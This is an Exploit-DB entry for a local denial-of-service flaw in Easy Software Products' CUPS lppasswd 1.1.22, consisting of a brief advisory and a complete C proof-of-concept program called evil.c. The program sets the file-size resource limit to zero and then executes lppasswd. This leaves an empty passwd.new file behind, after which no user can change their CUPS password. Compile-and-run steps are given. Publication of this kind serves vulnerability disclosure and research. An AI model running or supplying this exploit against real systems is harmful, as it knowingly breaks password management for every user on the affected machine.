Easy Software Products LPPassWd 1.1.22 - Resource Limit Denial of Service

EDB-ID:

25012


Platform:

Windows

Published:

2004-12-11

// source: https://www.securityfocus.com/bid/12005/info

Easy Software Products lppasswd is prone to a locally exploitable denial of service vulnerability. This issue occurs when the program attempts to write a file to the system that will exceed any file size resource limits in place. This presents a vulnerability since an unprivileged user with CUPS credentials may set these resource limits and then invoke the application. This will create an empty '/usr/local/etc/cups/passwd.new' file. If this file is present, then future invocations of lppasswd will fail.

Successful exploitation will prevent users from changing their CUPS passwords with lppasswd. 

/*
 * evil.c
 * 2004.12.11
 * Bartlomiej Sieka
 *
 * This program executes the lpasswd(1) password changing utility
 * in way that prevents its further use, i.e. after this program
 * has been executed, all users on the system will be unable to change
 * their CUPS passwords. This is not a documented feature of lppasswd(1)
 * and is certainly unauthorized.
 *
 * This program has been tested with lppasswd(1) versions 1.1.19 and
 * 1.1.22 on FreeBSD 5.2.
 *
 * The recipe:
 * gcc -o evil evil.c
 * ./evil
 * Type in passwords as requested, and voila! This will create an empty
 * file /usr/local/etc/cups/passwd.new. The existence of this file makes
 * lppasswd(1) quit before changing users password with message
 * "lppasswd: Password file busy!".
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
extern char **environ;

int main(int argc, char **argv){

  char *cmd = "/usr/local/bin/lppasswd";
  char *args[] = { "/usr/local/bin/lppasswd", 0x00 };

  /* set the file size limit to 0 */
  struct rlimit rl;
  rl.rlim_cur = 0;
  rl.rlim_max = 0;
  setrlimit(RLIMIT_FSIZE, &rl);

  /* execute the poor victim */
  execve(cmd, args, environ);
}